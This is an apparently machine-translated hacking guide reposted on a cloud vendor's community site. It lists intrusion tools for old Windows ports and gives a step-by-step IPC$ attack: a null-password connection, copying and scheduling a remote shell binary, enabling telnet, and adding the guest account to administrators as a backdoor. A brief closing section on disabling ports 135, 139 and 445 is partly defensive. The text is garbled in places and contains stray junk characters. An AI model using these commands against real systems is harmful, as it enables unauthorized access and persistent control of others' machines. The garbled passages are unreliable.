Detailed description of port intrusion

Source: Internet
Author: User
Tags net time

Port 1.135 intrusion

You can use an NT scanner to scan the desired IP address.

Use recton2.5 to enable the 3389 or Telnet service.

Port 2.139 intrusion

A weak password is used to scan the port.

Scanning weak passwords in batches with X-SCAN

3. port 1433 intrusion

Scanport.exe has 1433 machines.

Sqlscanpas *. ** E. dictionary cracking (dictionary is the key)

Last sqltool *. ** e intrusion

SQL's hello overflow vulnerability can intrude SQL's SP2 and lower systems.

NC-VV-l-P local port sqlhellof.exe intrude into IP 1433 local IP local port

(The test is successful)

Sqlhelloz.exe invades IP 1433 (this is a forward connection)

4. Port 4899 intrusion

Use the 4899filter .exe to scan machines with empty passwords

3899 of intrusions

For very early machines, you can test the overflow of (win3389ex.exe)

For 2000 machines, try dictionary cracking. (Tscrack.exe)

6. 80 intrusion

For machines earlier than SP3, WebDAV can be used for intrusion;

For the BBS forum, you can try to upload the loopholes (upfile.exeor dvup_delphi.exe)

You can use SQL for injection. (Ah d injection software ).

7. Serv-U intrusion (port 21)

Overflow intrusion can be performed on systems 5.004 and below. (Serv5004.exe)

For systems 5.1.0.0 and earlier, local permissions can be upgraded. (Servlocal.exe)

The MD5 encryption password for Serv-U can be cracked in the dictionary. (Crack. vbs)

Enter a password that is encrypted by the serv-u(34, pass the comparison with the dictionary (dict.txt) to obtain the password.

554 Port

Use real554.exe for intrusion.

J/'Ow] 6 K!

6129 Port

Dameware6129.exe intrusion.

10. System Vulnerabilities

Ms03026, ms03039, ms03049, and ms04011 vulnerabilities were exploited on ports 135 and 445,

Carry out overflow intrusion.

3127 and other ports

Attackers can exploit the port opened by the doomvirus to intrude data by using nodoom.exe. (Mydoomscan.exe can be used ).

12. Other intrusions

Use shanlu's deployment software (winntautoattack.exe ).

Classic IPC $ intrusion

1. C:/> net use // 127.0.0.1/IPC $ ""/User: "admintitrators"

This is the username scanned by "streamer", which is "Administrators" and the password is "null, you can use this command to establish a connection with 127.0.0.1. Because the password is "null", you do not need to enter the first quotation mark. The user name in the next double quotation mark is

, Enter the administrators command.

2. C:/> copy srv.exe // 127.0.0.1/ADMIN $

Copy srv.exe first, which is available in the tools directory of the streaming ($ here refers to the admin user's

C:/winnt/system32/, you can also use C $, d $, which means drive C and drive D. It depends on where you want to copy it.

3. C:/> net time // 127.0.0.1

Check the time and find that the current time of 127.0.0.1 is. The command is successfully completed.

4. C:/> at // 127.0.0.1 11: 05 srv.exe

Use the atcommand to start srv.exe (the time set here is faster than the host time, or how do you start it .;*!

5. C:/> net time // 127.0.0.1

Check the time? If the current time of 127.0.0.1 is, prepare

Start the following command.

6. C:/> Telnet 127.0.0.1 99

The Telnet command is used here. Note that the port is 99. Telnet uses port 23 by default, but

SRV creates a shell with port 99 for us on the other computer.

Although we can telnet up, But SRV is a one-time, the next login will be activated again! Therefore, create a Telnet service! This requires NTLM.

7. C:/> copy ntlm.exe // 127.0.0.1/ADMIN $

Use the copycommand to upload ntlm.exeto the Upload File (ntlm.exe is also in the tools directory of "streaming light ).

8. C:/winnt/system32> NTLM

Enter NTLM to start (Here C:/winnt/system32> refers to the peer computer, and running NTLM actually makes this

Programs run on the other computer ). When "done" appears, it indicates that it has been started normally. Use "Net start Telnet" to enable the telnet service!

9. Telnet 127.0.0.1, and enter the user name and password to enter the other party. The operation is like the operation on DOS.

Just as easy! (Then what do you want to do? Do what you want, haha )!

To prevent this, we need to activate guest and add it to the Management Group.

10. C:/> net user guest/active: Yes

Activate the other guest user

11. C:/> net user guest 1234

Change the password of guest to 1234, or set the password.

12. C:/> net localgroup administrators guest/Add

Change guest to administrator

 

 

This time we are talking about shutting down high-risk ports!
It is mainly for the previous period of time and several hot ports!
It is dangerous for our personal computers! That is, 135,139,445
First, check port 139!
Disable NetBIOS!
If you are using broadband Internet!
Disable the cat!
If you are from a LAN!
Disable Nic directly! That is, the local connection!
You will be prompted to restart later!
Restart and then OK!
Below is 445. There are many methods!
Here is the most practical method!
This port is also the most dangerous!
Microsoft will make money! Leave such a hidden danger to the operating system!
Open the Registry first!
HKEY_LOCAL_MACHINE/system/CurrentControlSet/services/netbt/parameters
Find this project in turn!
Here!
The name of the New DWORD item is smbdeviceenabled.
The value is 0!
The last step is 135. This is a little troublesome!
We can still close him!
Open the firewall first!
We enable the firewall!
Because this firewall is disabled by default!
So we also disabled 135! However, many network access programs cannot access Asia!
Haha!
It doesn't matter !~ You only need to add him out of the column!
If WMI is in your computer firewall
That's it! Be sure to delete it or remove the marker!
Enable the firewall when there is no problem!
WMI is the port 135 used.
If there are files and printers!
I suggest you cancel him!
Because this is 445, is it safe!
After all, these cannot guarantee of the security!
You can't do it, just think of it!

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.